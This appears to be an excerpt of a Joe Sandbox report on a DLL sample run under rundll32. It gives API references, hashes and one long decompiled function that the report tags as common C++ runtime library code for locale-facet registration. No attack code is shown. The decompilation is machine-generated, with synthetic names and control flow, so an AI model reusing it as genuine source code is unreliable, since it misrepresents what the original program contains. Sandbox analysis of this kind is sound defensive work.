                          0x6e20a099
                          0x6e20a097

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A060
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A06A
                          • int.LIBCPMT ref: 6E20A081
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E20A0A4
                          • std::_Facet_Register.LIBCPMT ref: 6E20A0BB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A0DB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A0F9
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID:
                          • API String ID: 2594415655-0
                          • Opcode ID: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
                          • Instruction ID: 962cb3cc37723b47a9a2c980b112aa3f0b7d4fa8a928716d4613960256540487
                          • Opcode Fuzzy Hash: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
                          • Instruction Fuzzy Hash: 9111C6B691052DDBCF01DBE4C898AEDB77BBF44B15F544908E4106B2D0DFB49A48C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F183, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t814 - 0x14, 0);
				_t777 =  *0x6e2c6de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6E1E161C(0x6e2c6d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6E2066BA(_t814 - 0x14);
					return E6E220075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6E210EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t814 - 0x20);
							E6E223D74(_t814 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t758, _t777, 0x14);
							E6E206653(_t814 - 0x14, 0);
							_t778 =  *0x6e2c6db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6E1E161C(0x6e2c6d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6E2066BA(_t814 - 0x14);
								return E6E220075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6E210F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t814 - 0x20);
										E6E223D74(_t814 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t575, _t759, _t778, 0x14);
										E6E206653(_t814 - 0x14, 0);
										_t779 =  *0x6e2c6dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6E1E161C(0x6e2c6d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6E2066BA(_t814 - 0x14);
											return E6E220075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6E210F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t814 - 0x20);
													E6E223D74(_t814 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t575, _t760, _t779, 0x14);
													E6E206653(_t814 - 0x14, 0);
													_t780 =  *0x6e2c6dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6E1E161C(0x6e2c6d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6E2066BA(_t814 - 0x14);
														return E6E220075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6E210FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t814 - 0x20);
																E6E223D74(_t814 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t575, _t761, _t780, 0x14);
																E6E206653(_t814 - 0x14, 0);
																_t781 =  *0x6e2c6df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6E1E161C(0x6e2c6d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6E2066BA(_t814 - 0x14);
																	return E6E220075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6E211057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t814 - 0x20);
																			E6E223D74(_t814 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t575, _t762, _t781, 0x14);
																			E6E206653(_t814 - 0x14, 0);
																			_t782 =  *0x6e2c6dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6E1E161C(0x6e2c6d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6E2066BA(_t814 - 0x14);
																				return E6E220075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6E2110BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t814 - 0x20);
																						E6E223D74(_t814 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t575, _t763, _t782, 0x14);
																						E6E206653(_t814 - 0x14, 0);
																						_t783 =  *0x6e2c6df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6E1E161C(0x6e2c6da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6E2066BA(_t814 - 0x14);
																							return E6E220075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6E211127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t814 - 0x20);
																									E6E223D74(_t814 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t575, _t764, _t783, 0x14);
																									E6E206653(_t814 - 0x14, 0);
																									_t784 =  *0x6e2c6df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6E1E161C(0x6e2c6da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6E2066BA(_t814 - 0x14);
																										return E6E220075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6E2111AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t814 - 0x20);
																												E6E223D74(_t814 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t575, _t765, _t784, 0x14);
																												E6E206653(_t814 - 0x14, 0);
																												_t785 =  *0x6e2c6dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6E1E161C(0x6e2c6d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6E2066BA(_t814 - 0x14);
																													return E6E220075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6E211230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t814 - 0x20);
																															E6E223D74(_t814 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t575, _t766, _t785, 0x14);
																															E6E206653(_t814 - 0x14, 0);
																															_t786 =  *0x6e2c6dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6E1E161C(0x6e2c6d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6E2066BA(_t814 - 0x14);
																																return E6E220075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6E2112B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t814 - 0x20);
																																		E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t575, _t767, _t786, 0x14);
																																		E6E206653(_t814 - 0x14, 0);
																																		_t787 =  *0x6e2c6dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6E1E161C(0x6e2c6d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6E2066BA(_t814 - 0x14);
																																			return E6E220075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6E211339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t814 - 0x20);
																																					E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t575, _t768, _t787, 0x14);
																																					E6E206653(_t814 - 0x14, 0);
																																					_t788 =  *0x6e2c6db0; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6E1E161C(0x6e2c6d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6E2066BA(_t814 - 0x14);
																																						return E6E220075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6E2113A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t814 - 0x20);
																																								E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t575, _t769, _t788, 0x14);
																																								E6E206653(_t814 - 0x14, 0);
																																								_t789 =  *0x6e2c6ddc; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6E1E161C(0x6e2c6d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6E2066BA(_t814 - 0x14);
																																									return E6E220075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6E211409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t814 - 0x20);
																																											E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t575, _t770, _t789, 0x14);
																																											E6E206653(_t814 - 0x14, 0);
																																											_t790 =  *0x6e2c6de0; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6E1E161C(0x6e2c6d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6E2066BA(_t814 - 0x14);
																																												return E6E220075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6E211471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t814 - 0x20);
																																														E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t575, _t771, _t790, 0x14);
																																														E6E206653(_t814 - 0x14, 0);
																																														_t791 =  *0x6e2c6dfc; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6E1E161C(0x6e2c6da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6E2066BA(_t814 - 0x14);
																																															return E6E220075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6E2114EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t814 - 0x20);
																																																	E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t575, _t772, _t791, 0x14);
																																																	E6E206653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6e2c6dcc; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6E1E161C(0x6e2c6d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6E2066BA(_t814 - 0x14);
																																																		return E6E220075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6E211558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t814 - 0x20);
																																																				E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t575, _t773, _t792, 0x14);
																																																				E6E206653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6e2c6e00; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6E1E161C(0x6e2c6dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6E2066BA(_t814 - 0x14);
																																																					return E6E220075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6E2115C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t814 - 0x20);
																																																							E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t575, _t774, _t793, 0x14);
																																																							E6E206653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6e2c6dd0; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6E1E161C(0x6e2c6d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6E2066BA(_t814 - 0x14);
																																																								return E6E220075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6E21162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6E1E1438(_t701);
																																																										E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e26851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6e26c0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6E21542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6E220075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6E206FD3(__eflags, _t775);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6e2c6dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6E206FD3(__eflags, _t774);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6e2c6e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6E206FD3(__eflags, _t773);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6e2c6dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6E206FD3(__eflags, _t772);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6e2c6dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6E206FD3(__eflags, _t771);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6e2c6de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6E206FD3(__eflags, _t770);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6e2c6ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6E206FD3(__eflags, _t769);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6e2c6db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6E206FD3(__eflags, _t768);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6e2c6dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6E206FD3(__eflags, _t767);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6e2c6dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6E206FD3(__eflags, _t766);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6e2c6dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6E206FD3(__eflags, _t765);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6e2c6df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6E206FD3(__eflags, _t764);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6e2c6df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6E206FD3(__eflags, _t763);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6e2c6dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6E206FD3(__eflags, _t762);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6e2c6df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6E206FD3(__eflags, _t761);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6e2c6dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6E206FD3(__eflags, _t760);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6e2c6dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6E206FD3(__eflags, _t759);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6e2c6db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6E206FD3(__eflags, _t758);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6e2c6de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}




























































                          0x6e20f183
                          0x6e20f183
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
